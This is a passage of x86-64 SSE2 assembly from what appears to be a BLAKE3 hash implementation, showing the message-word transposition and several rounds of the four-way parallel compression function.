movdqa xmmword ptr [rsp+0x10], xmm9
movdqa xmmword ptr [rsp+0x20], xmm12
movdqa xmmword ptr [rsp+0x30], xmm13
movdqu xmm8, xmmword ptr [r8+rdx-0x30]
movdqu xmm9, xmmword ptr [r9+rdx-0x30]
movdqu xmm10, xmmword ptr [r10+rdx-0x30]
movdqu xmm11, xmmword ptr [r11+rdx-0x30]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp+0x40], xmm8
movdqa xmmword ptr [rsp+0x50], xmm9
movdqa xmmword ptr [rsp+0x60], xmm12
movdqa xmmword ptr [rsp+0x70], xmm13
movdqu xmm8, xmmword ptr [r8+rdx-0x20]
movdqu xmm9, xmmword ptr [r9+rdx-0x20]
movdqu xmm10, xmmword ptr [r10+rdx-0x20]
movdqu xmm11, xmmword ptr [r11+rdx-0x20]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp+0x80], xmm8
movdqa xmmword ptr [rsp+0x90], xmm9
movdqa xmmword ptr [rsp+0xA0], xmm12
movdqa xmmword ptr [rsp+0xB0], xmm13
movdqu xmm8, xmmword ptr [r8+rdx-0x10]
movdqu xmm9, xmmword ptr [r9+rdx-0x10]
movdqu xmm10, xmmword ptr [r10+rdx-0x10]
movdqu xmm11, xmmword ptr [r11+rdx-0x10]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp+0xC0], xmm8
movdqa xmmword ptr [rsp+0xD0], xmm9
movdqa xmmword ptr [rsp+0xE0], xmm12
movdqa xmmword ptr [rsp+0xF0], xmm13
movdqa xmm9, xmmword ptr [BLAKE3_IV_1+rip]
movdqa xmm10, xmmword ptr [BLAKE3_IV_2+rip]
movdqa xmm11, xmmword ptr [BLAKE3_IV_3+rip]
movdqa xmm12, xmmword ptr [rsp+0x110]
movdqa xmm13, xmmword ptr [rsp+0x120]
movdqa xmm14, xmmword ptr [BLAKE3_BLOCK_LEN+rip]
movd xmm15, eax
pshufd xmm15, xmm15, 0x00
prefetcht0 [r8+rdx+0x80]
prefetcht0 [r9+rdx+0x80]
prefetcht0 [r10+rdx+0x80]
prefetcht0 [r11+rdx+0x80]
paddd xmm0, xmmword ptr [rsp]
paddd xmm1, xmmword ptr [rsp+0x20]
paddd xmm2, xmmword ptr [rsp+0x40]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [BLAKE3_IV_0+rip]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x10]
paddd xmm1, xmmword ptr [rsp+0x30]
paddd xmm2, xmmword ptr [rsp+0x50]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x80]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp+0xC0]
paddd xmm3, xmmword ptr [rsp+0xE0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x90]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0xD0]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x20]
paddd xmm1, xmmword ptr [rsp+0x30]
paddd xmm2, xmmword ptr [rsp+0x70]
paddd xmm3, xmmword ptr [rsp+0x40]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x60]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp]
paddd xmm3, xmmword ptr [rsp+0xD0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x10]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0x90]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xB0]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp+0xE0]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x30]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp+0xD0]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x40]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0x20]
paddd xmm3, xmmword ptr [rsp+0xE0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x60]
paddd xmm1, xmmword ptr [rsp+0x90]
paddd xmm2, xmmword ptr [rsp+0xB0]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x50]
paddd xmm1, xmmword ptr [rsp]
paddd xmm2, xmmword ptr [rsp+0xF0]
paddd xmm3, xmmword ptr [rsp+0x10]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xA0]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0xE0]
paddd xmm3, xmmword ptr [rsp+0xD0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x70]
paddd xmm1, xmmword ptr [rsp+0x90]
paddd xmm2, xmmword ptr [rsp+0x30]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x40]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0x50]
paddd xmm3, xmmword ptr [rsp+0x10]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp]
paddd xmm1, xmmword ptr [rsp+0x20]
paddd xmm2, xmmword ptr [rsp+0x80]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xC0]
paddd xmm1, xmmword ptr [rsp+0x90]
paddd xmm2, xmmword ptr [rsp+0xF0]
paddd xmm3, xmmword ptr [rsp+0xE0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xD0]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0xA0]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x70]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
